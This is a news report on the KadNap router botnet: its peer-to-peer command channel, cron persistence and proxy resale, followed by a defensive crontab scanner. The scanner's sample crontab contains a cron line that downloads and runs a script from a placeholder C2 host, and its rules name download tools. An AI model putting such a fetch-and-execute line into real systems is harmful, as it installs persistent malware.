Researchers uncovered KadNap, a router malware first seen in August 2025 that has compromised more than 14,000 devices worldwide with over 60 percent of victims in the United States, a technical analysis by Lumen Black Lotus Labs said.
KEY FACTS
- Incident: KadNap targets Asus and other edge routers
- Infections: More than 14,000 devices, over 60% in the U.S.
- Technique: Uses a Kademlia Distributed Hash Table peer-to-peer network to conceal C2
- Persistence: Cron job downloads aic.sh, renames it to .asusrouter and executes a malicious ELF named kad
First detected in August 2025, the campaign has spread primarily in the United States with additional infections in Taiwan, Hong Kong, Russia, the U.K., Australia, Brazil, France, Italy and Spain, the report states.
The malware implements a custom Kademlia DHT protocol so compromised nodes can locate and connect with command servers without exposing a central infrastructure. The report says operators use the protocol to make communications resilient to monitoring and disruption.
The infection chain relies on a shell script named aic.sh retrieved from a command address. The script creates an hourly cron entry that fetches and runs the payload, renames files to .asusrouter, installs an ELF called kad and supports ARM and MIPS devices.
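The persistence described above leaves a recognizable footprint in a router's crontab. The following is an added example of a heuristic scan for that footprint; it is not code from Black Lotus Labs or from the malware, and the download-tool list, the rules and the sample crontab (with a placeholder host) are assumptions. Only the file names aic.sh, .asusrouter and kad come from the report.

```python
"""Heuristic crontab scan for the KadNap persistence described above: an hourly job
that fetches aic.sh, renames it to .asusrouter and runs the kad ELF.
Added example, not code from Black Lotus Labs or from the malware."""
import re
from posixpath import basename

# File names come from the report; the tool list and the rules are my assumptions.
KADNAP_NAMES = {"aic.sh", ".asusrouter", "kad"}
FETCH_TOOLS = {"wget", "curl", "tftp", "ftpget"}
TOKEN_SPLIT = re.compile(r"""[\s;|&()'"]+""")
# user-style crontab entry: five schedule fields (or an @shortcut), then the command
ENTRY = re.compile(r"^(@\w+|(?:\S+\s+){4}\S+)\s+(.*)$")

def is_top_of_hour(spec):
    """True for 'M * * * *' (exactly one run per hour) or @hourly."""
    f = spec.split()
    return spec == "@hourly" or (len(f) == 5 and f[0].isdigit() and f[1:] == ["*"] * 4)

def analyze_cron_line(line):
    """Return the reasons one crontab line looks like KadNap persistence ([] if clean)."""
    line = line.strip()
    m = ENTRY.match(line) if line and not line.startswith("#") else None
    if not m:
        return []
    spec, command = m.group(1), m.group(2)
    # Compare basenames so /tmp/kad and http://host/aic.sh both match the indicator.
    names = {basename(tok) for tok in TOKEN_SPLIT.split(command) if tok}
    reasons = []
    artifacts = sorted(KADNAP_NAMES & names)
    if artifacts:
        reasons.append("references KadNap artifact(s): " + ", ".join(artifacts))
    fetch = ", ".join(sorted(FETCH_TOOLS & names))
    if fetch and is_top_of_hour(spec):
        reasons.append("hourly job that downloads content (%s)" % fetch)
    elif fetch:
        reasons.append("cron job downloads content (%s)" % fetch)
    return reasons

def scan_crontab(text):
    """Map each suspicious crontab line to its reasons; clean lines are omitted."""
    return {l.strip(): r for l in text.splitlines() if (r := analyze_cron_line(l))}

# Constructed sample crontab, not a real capture; C2-PLACEHOLDER stands in for a host.
SAMPLE_CRONTAB = """\
30 3 * * 0 /sbin/logrotate.sh
0 * * * * wget -q http://C2-PLACEHOLDER/aic.sh -O /tmp/aic.sh; mv /tmp/aic.sh /tmp/.asusrouter; sh /tmp/.asusrouter
*/15 * * * * curl -s http://update.example.invalid/check
"""
```

On a live device, feed it the output of `crontab -l` or the contents of the cron spool directory; a hit on the artifact names is the strong signal, while the download rules only rank entries for manual review.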
KadNap also queries a Network Time Protocol server and stores time and host uptime to create a hash used to locate peers. Supporting files are reported to disable SSH on port 22 and extract lists of IP:port combinations to contact.
Infected devices are offered as resident proxies through a service called Doppelgänger, assessed as a rebrand of a prior proxy service. The report notes that co-infections on some routers complicate attribution of specific malicious activity.
Defensive measures recommended include updating SOHO router firmware, rebooting devices regularly, changing default passwords, securing management interfaces and replacing unsupported end-of-life models.
WHY IT MATTERS
KadNap’s use of a decentralized peer-to-peer DHT makes the botnet harder to disrupt and enables compromised home and small office routers to be repurposed as anonymized proxy capacity for malicious actors.